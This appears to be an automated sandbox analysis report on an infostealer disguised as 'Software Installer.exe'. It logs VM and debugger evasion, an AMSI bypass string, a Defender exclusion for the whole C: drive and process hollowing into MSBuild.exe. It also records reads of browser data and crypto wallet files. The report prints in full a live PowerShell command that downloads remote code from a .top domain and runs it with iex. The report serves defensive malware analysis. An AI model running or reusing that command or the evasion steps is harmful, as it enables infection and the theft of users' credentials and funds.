Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_000001D775175F63 push rbp; ret 0_2_000001D775175F64
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_000001D776D333EE push rsp; retf 0_2_000001D776D333EF
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_000001D776DA51A5 push rax; ret 0_2_000001D776DA51AF
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_000001D776DA40B8 push rdx; retf 0_2_000001D776DA40C2
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_000001D7775C6856 push rsi; iretd 0_2_000001D7775C686E
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_000001D7775C4B4F push rbp; ret 0_2_000001D7775C4B50
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_000001D7775C5CBC push rsi; retf 0_2_000001D7775C5CBD
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_000001D7775C6B5F push rbp; retf 0_2_000001D7775C6B64
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_000001D7775C3EAF push rdx; retf 0_2_000001D7775C3ED8
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_000001D7775C61A6 pushfq ; ret 0_2_000001D7775C61C8
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_000001D777801695 push r12; iretd 0_2_000001D777801697
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_000001D7778016D5 push rcx; retf 0_2_000001D7778016D6
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_000001D777A23C2C push rbp; iretd 0_2_000001D777A23C2D
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_000001D777A24C4C push rsp; retf 0_2_000001D777A24C52
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_000001D777A227E4 push 40DA147Ch; ret 0_2_000001D777A227E9
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_000001D777A24DF2 push rdi; retf 0_2_000001D777A24DF9
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_000001D777A23730 push rsp; iretd 0_2_000001D777A23737
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_000001D777A621AE push rsi; retf 0_2_000001D777A621C3
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_000001D777B319A1 push rbp; ret 0_2_000001D777B319A5
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_000001D777B34189 push rax; ret 0_2_000001D777B3418A
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_000001D777B3527A push rsp; iretd 0_2_000001D777B3528F
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_000001D777B33A46 push rcx; retf 0_2_000001D777B33A47
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_000001D777EC2175 push A9951FF5h; retn 005Fh 0_2_000001D777EC217D
Source: C:\Users\user\Desktop\Software Installer.exe | File created: C:\Users\user\Microsoft_Driver_vs_2019.exe

Boot Survival

Source: C:\Users\user\Desktop\Software Installer.exe | File created: C:\Users\user\Microsoft_Driver_vs_2019.exe

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49714
Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 5000
Source: unknown | Network traffic detected: HTTP traffic on port 5000 -> 49727
Source: C:\Users\user\Desktop\Software Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Software Installer.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Software Installer.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\Software Installer.exe Memory allocated: 196DC750000 memory reserve | memory write watch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Software Installer.exe Window / User API: threadDelayed 850
Source: C:\Users\user\Desktop\Software Installer.exe Window / User API: threadDelayed 824
Source: C:\Users\user\Desktop\Software Installer.exe Window / User API: threadDelayed 3418
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7401
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2195
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4838
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1774
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5685
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1458
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6140 Thread sleep count: 7401 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6140 Thread sleep count: 2195 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1364 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3872 Thread sleep count: 4838 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6976 Thread sleep count: 1774 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1652 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3528 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 348 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1428 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2284 Thread sleep count: 5685 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2288 Thread sleep count: 1458 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3668 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3332 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1940 Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\Desktop\Software Installer.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\Desktop\Software Installer.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Users\user\Microsoft_Driver_vs_2019.exe | Code function: 11_2_00007FF7ECDDA96C FindFirstFileExW,11_2_00007FF7ECDDA96C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C09000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmware workstation
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C09000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: hyper-v video
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C00000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: No Windows Defender found. Skipping AMSI bypass. Installed AVs: Fake Method 1 executed.Fake Method 2 executed.Inner Method executed.000000000000vmware svgavirtualbox graphics adapterqemu vgaparallels display adapterxen framebufferAdd-MpPreference -ExclusionPath ''powershell.exe[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex-ExecutionPolicy Bypass -Command ""Error: runas\\.\root\SecurityCenter2SELECT * FROM AntiVirusProductdisplayName
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C09000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmware svga
Source: MSBuild.exe, 0000000D.00000002.1760406613.00000000010C0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWp2
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C17000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vboxservice
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0E69000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: `JAevZX1PkJw6rmn08YHO1BU8O533Dv20CASFFLDs8ghy19WDoW1EMRzg3Udarb6uKF6DdkPGCZsSip4xbRBiwGAnYvmcIwQi`$
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C09000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmware fusion
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C09000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: hyper-v
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C17000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwareuser
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C09000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmware player
Source: MSBuild.exe, 0000000D.00000002.1760579162.00000000010F5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C17000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmsrvc
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C09000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: qemu vga
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C17000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwaretray
Source: Software Installer.exe, 00000000.00000003.2138571362.000001D776E40000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000003.2437966605.000001D776E21000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000003.1911748693.000001D776E40000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653541198.000001D776E40000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000003.1758956113.000001D776E21000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000003.1763608180.000001D776E40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1508507784.0000011AFAB7B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C17000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vboxtray
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C17000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: qemu-ga
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C09000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmware
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C17000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmusrvc
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C09000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: microsoft hyper-v
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C17000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmtoolsd
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C09000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmware virtual
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0E69000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: `JAevZX1PkJw6rmn08YHO1BU8O533Dv20CASFFLDs8ghy19WDoW1EMRzg3Udarb6uKF6DdkPGCZsSip4xbRBiwGAnYvmcIwQi
Source: C:\Users\user\Desktop\Software Installer.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Software Installer.exe | Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 13_2_00449B30 LdrInitializeThunk,13_2_00449B30
Source: C:\Users\user\Microsoft_Driver_vs_2019.exe | Code function: 11_2_00007FF7ECDD25E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF7ECDD25E4
Source: C:\Users\user\Microsoft_Driver_vs_2019.exe | Code function: 11_2_00007FF7ECDDD7BC GetProcessHeap,11_2_00007FF7ECDDD7BC
Source: C:\Users\user\Desktop\Software Installer.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Microsoft_Driver_vs_2019.exe | Code function: 11_2_00007FF7ECDD61C0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF7ECDD61C0
Source: C:\Users\user\Microsoft_Driver_vs_2019.exe | Code function: 11_2_00007FF7ECDD1FB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FF7ECDD1FB4
Source: C:\Users\user\Microsoft_Driver_vs_2019.exe | Code function: 11_2_00007FF7ECDD2788 SetUnhandledExceptionFilter,11_2_00007FF7ECDD2788
Source: C:\Users\user\Desktop\Software Installer.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Software Installer.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Users\user\Microsoft_Driver_vs_2019.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Software Installer.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex"
Source: C:\Users\user\Microsoft_Driver_vs_2019.exe | Code function: 11_2_00007FF7ECDD1560 GetModuleHandleW,GetModuleFileNameA,_fread_nolock,FreeConsole,CreateProcessA,VirtualAlloc,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,11_2_00007FF7ECDD1560
Source: C:\Users\user\Microsoft_Driver_vs_2019.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Microsoft_Driver_vs_2019.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\Microsoft_Driver_vs_2019.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\Users\user\Microsoft_Driver_vs_2019.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44E000
Source: C:\Users\user\Microsoft_Driver_vs_2019.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 451000
Source: C:\Users\user\Microsoft_Driver_vs_2019.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 45F000
Source: C:\Users\user\Microsoft_Driver_vs_2019.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: EE2008
Source: C:\Users\user\Desktop\Software Installer.exe | Process created: C:\Users\user\Microsoft_Driver_vs_2019.exe "C:\Users\user\Microsoft_Driver_vs_2019.exe"
Source: C:\Users\user\Microsoft_Driver_vs_2019.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Microsoft_Driver_vs_2019.exe | Code function: 11_2_00007FF7ECDE2020 cpuid 11_2_00007FF7ECDE2020
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Microsoft_Driver_vs_2019.exe | Code function: 11_2_00007FF7ECDD24BC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,11_2_00007FF7ECDD24BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Software Installer.exe, 00000000.00000003.2141927019.000001D774DF9000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000003.1758956113.000001D776EC0000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000003.1763079562.000001D774E28000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000003.1762893528.000001D774DF1000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000003.2142400706.000001D774E28000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653541198.000001D776EC0000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000003.1911748693.000001D776EC0000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000003.2138571362.000001D776EC0000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000003.2439185166.000001D774DBD000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000003.1561797642.000001D774DF2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\Software Installer.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: MSBuild.exe, 0000000D.00000002.1761468258.000000000110B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum
Source: MSBuild.exe, 0000000D.00000002.1761468258.000000000110B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C17000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: `xX7DYqMEC6zybRIKbKQNtWjDU8uf67JAXX4ffHZ3QCkabZm1hpQ15oqS4ldMEFJYEt4erFotw24cl5JZvQNXjsjoQUZbVZpY
Source: MSBuild.exe, 0000000D.00000002.1761468258.000000000110B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
Source: MSBuild.exe, 0000000D.00000002.1762285185.0000000001145000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ExodusWeb3
Source: MSBuild.exe, 0000000D.00000002.1761468258.000000000110B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Ethereum
Source: Software Installer.exe | String found in binary or memory: get_MachineKeyStore
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
